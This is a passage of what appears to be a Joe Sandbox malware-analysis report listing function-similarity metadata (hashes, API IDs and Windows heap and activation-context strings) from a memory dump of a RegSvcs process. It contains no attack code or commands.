• Opcode Fuzzy Hash: 0e226dffb496be10f41393d83fa57324c9f92d3ab73f8d64aa16b4989defbf15
• Instruction Fuzzy Hash: 0390022120184552D24072598905F0F410587E1342F95C02EA4156554DCD1A89566721
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c77d57a1c558aafc4d3fae7fb9be1c2238bfd0e9415eb34bf345e1db7a0edf55
• Instruction ID: 76e28ed9f350a4ad1f76669855933339268c00f56b0119d7f2b7e96b06a9b182
• Opcode Fuzzy Hash: c77d57a1c558aafc4d3fae7fb9be1c2238bfd0e9415eb34bf345e1db7a0edf55
• Instruction Fuzzy Hash: D790023160550512D20071598615B06100587D0341F65C426A0424568E8B9A8A5275A2
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a534aacec7b760f92614495ae8ebaac0c7a5bf2b2d4c87b343613bb570195f13
• Instruction ID: c63b1492a20870efe55b86a77369559deb03932e0804a347535f85b7247f7921
• Opcode Fuzzy Hash: a534aacec7b760f92614495ae8ebaac0c7a5bf2b2d4c87b343613bb570195f13
• Instruction Fuzzy Hash: 3C90022124545212D250715D8505B164005A7E0341F55C036A0814594E895A89567221
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 04d5518840fd7437e2796ae56cda42d06e447ecdaed153fc07dc101644f37aae
• Instruction ID: 855368dc59d132d533faf2fb852845048a9ad40bd2d821cdfeb87640e5d04715
• Opcode Fuzzy Hash: 04d5518840fd7437e2796ae56cda42d06e447ecdaed153fc07dc101644f37aae
• Instruction Fuzzy Hash: B290023520140512D61071599905B46004687D0341F55D426A0424558E8A5989A2B121
Uniqueness

Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 08ec9f5f1e8659905309fb2e9f3a9f0e8dfd2256a564f306c3aed2310f754460
                                                                                            • Instruction ID: 6a543513857fe9d9bcddc8ef53b6baadf62392f5b73fae7bc599bae8a5aa385f
                                                                                            • Opcode Fuzzy Hash: 08ec9f5f1e8659905309fb2e9f3a9f0e8dfd2256a564f306c3aed2310f754460
                                                                                            • Instruction Fuzzy Hash: 2690023120240252964072599905F4E410587E1342B95D42AA0015554DCD1989626221
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                            • Instruction ID: a97ef88a12050e85bd610e44d70fdb988a243a14889f6765f0f56bec3d8fcbee
                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                            • Instruction Fuzzy Hash:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 6cad68a6982ec3429f9489da279ef8a1408dd3b24d1e32d4ead8e1b52e6b2629
                                                                                            • Instruction ID: 0b56fb7c719e5c3ff7e2cf9aeeaaf111cf14a9b70d78168d5ee2da2f01843103
                                                                                            • Opcode Fuzzy Hash: 6cad68a6982ec3429f9489da279ef8a1408dd3b24d1e32d4ead8e1b52e6b2629
                                                                                            • Instruction Fuzzy Hash: 1BA18CB5B44211CFD715CE18C890A2ABBE5FF88314F19456DEA86DB361EB35EC02CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                            • Instruction ID: 211f6f5f4dcaf8bc9a091815954e8fcfa0ffbe5511805a3138a79e2cd204f292
                                                                                            • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                            • Instruction Fuzzy Hash: 9F0237B0508341AFD345DF19C890A6FBBE5EFC5700F04896DF9858B260EB76E945CB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID:
                                                                                            • API String ID: 48624451-0
                                                                                            • Opcode ID: f613c33047d7e8eb691e4f27baba3f80aa65e979f933c5e8936f41d89b16af3b
                                                                                            • Instruction ID: 245f6642269519c87b6b7cbcc7c73a8eab5e1efcef675673f676d8c30fd94344
                                                                                            • Opcode Fuzzy Hash: f613c33047d7e8eb691e4f27baba3f80aa65e979f933c5e8936f41d89b16af3b
                                                                                            • Instruction Fuzzy Hash: 9651EBB6E00256BFCB50DF598D90ABEF7B8BB08300B148169E469D7641D734DE40BBE1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID:
                                                                                            • API String ID: 48624451-0
                                                                                            • Opcode ID: 49ad388c0e6f3209f9189e3822ab370a9ac3874a8157392e1be4b053c0f49320
                                                                                            • Instruction ID: ea8acfc22463307e705f8a409d0b96ce5c9192de374661a98cfa410ef0686f37
                                                                                            • Opcode Fuzzy Hash: 49ad388c0e6f3209f9189e3822ab370a9ac3874a8157392e1be4b053c0f49320
                                                                                            • Instruction Fuzzy Hash: D151F571A00665AFDB71DEDCC99097EBBF8AF44200B448859E4D6C7682DA74DA409760
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00FD79D5
                                                                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 00FD79D0, 00FD79F5
                                                                                            • SsHd, xrefs: 00F8A3E4
                                                                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00FD79FA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                            • API String ID: 0-929470617
                                                                                            • Opcode ID: b6f7aa6502e8bca95003aa98e4c8b3cd55d734a288fa179736d54e3395719eb1
                                                                                            • Instruction ID: fda919c1f71632a241c7abbabe6b27bd0bb14a0e20bdaf5201153d78318c0652
                                                                                            • Opcode Fuzzy Hash: b6f7aa6502e8bca95003aa98e4c8b3cd55d734a288fa179736d54e3395719eb1
                                                                                            • Instruction Fuzzy Hash: ABE1C671A083018FE724EE24C8947AAB7E1EB84324F184A2FE855CB391E775DD45E743
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00FD9346
                                                                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 00FD9341, 00FD9366
                                                                                            • GsHd, xrefs: 00F8D874
                                                                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00FD936B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                            • API String ID: 3446177414-576511823
                                                                                            • Opcode ID: 991b941a11b44fa20c75759f4b5c8bc6364a35a29f1454dbc13937bb68610f24
                                                                                            • Instruction ID: 12d65b4e5e75b8ea73b4b840e7353c070806ff8571f52d4483e5b7c0fd2230fd
                                                                                            • Opcode Fuzzy Hash: 991b941a11b44fa20c75759f4b5c8bc6364a35a29f1454dbc13937bb68610f24
                                                                                            • Instruction Fuzzy Hash: 0FE1B571A083418FDB24DF54C880BAAB7E5BF48328F184A2EE895CB3C1D775D945EB52
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-$0$0
                                                                                            • API String ID: 1302938615-699404926
                                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                            • Instruction ID: 54d4958207975169799cabb78e135a33163447426b1131e5b8e0dd2fab1e1522
                                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                            • Instruction Fuzzy Hash: E581C470E052499EDF24CF6AC8517FEBBB6AF85320F284259E851A7291CBB49C41EF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: $$@
                                                                                            • API String ID: 3446177414-1194432280
                                                                                            • Opcode ID: 5f7fae23f1fc6478667ad0c9bd46e64965c4e6c4a63b6eab8ea115ab807ca6e0
                                                                                            • Instruction ID: ac91588ce284040676195d3ee387550571408f79f7ed1d3789b9b6b3ae0aa2cc
                                                                                            • Opcode Fuzzy Hash: 5f7fae23f1fc6478667ad0c9bd46e64965c4e6c4a63b6eab8ea115ab807ca6e0
                                                                                            • Instruction Fuzzy Hash: AA812972D002699BDB71DB54CC45BEAB7B4AF08710F0441EAE90DB7280E7749E80DFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
• API String ID: 3446177414-56086060
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
• API String ID: 3446177414-3526935505
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: $
• API String ID: 3446177414-3993045852
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID: DebugPrintTimes$BaseInitThreadThunk
• String ID:
• API String ID: 4281723722-0
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
Uniqueness

Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-
                                                                                            • API String ID: 1302938615-2137968064
                                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                            • Instruction ID: 766c9f00b9988cf66362a79210f487c4e612ee8f32e0f2b732813fea367fbb6e
                                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                            • Instruction Fuzzy Hash: FB919171E083069ADB24FE6BC8816FEB7A5AFC4360F24451AE855A7280DB34CD41EF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • RtlDebugPrintTimes.NTDLL ref: 01048B03
                                                                                            • RtlDebugPrintTimes.NTDLL ref: 01048B5B
                                                                                              • Part of subcall function 00FB2B60: LdrInitializeThunk.NTDLL ref: 00FB2B6A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes$InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 1259822791-3916222277
                                                                                            • Opcode ID: 567f7d00355777d5aac982b96a0ae079d0d4342059a79462843597601d2b2f16
                                                                                            • Instruction ID: d336528c8a9da713d8a68623a397f796255619c0dab9a9a2e9b6fc02b80b4486
                                                                                            • Opcode Fuzzy Hash: 567f7d00355777d5aac982b96a0ae079d0d4342059a79462843597601d2b2f16
                                                                                            • Instruction Fuzzy Hash: 1461A271A1021C9BEB668B68CC45BED7BB8AB48700F0485EAF949E6191DB749F80CF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0$Flst
                                                                                            • API String ID: 0-758220159
                                                                                            • Opcode ID: c40a117681dcdbb30e6a7576aa67f0ab652e0215c31da3fd4776a2b05c09223d
                                                                                            • Instruction ID: aa5703c8e404ac1950381cfe9434f2ddf2233ab5e8dd01d493a48442c6cb4c52
                                                                                            • Opcode Fuzzy Hash: c40a117681dcdbb30e6a7576aa67f0ab652e0215c31da3fd4776a2b05c09223d
                                                                                            • Instruction Fuzzy Hash: F3519EB1E002558FCF24CF99C988769FBF4EF95724F14802ED45A9B250EBB0AD45DB80
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • RtlDebugPrintTimes.NTDLL ref: 00F9D959
                                                                                              • Part of subcall function 00F74859: RtlDebugPrintTimes.NTDLL ref: 00F748F7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
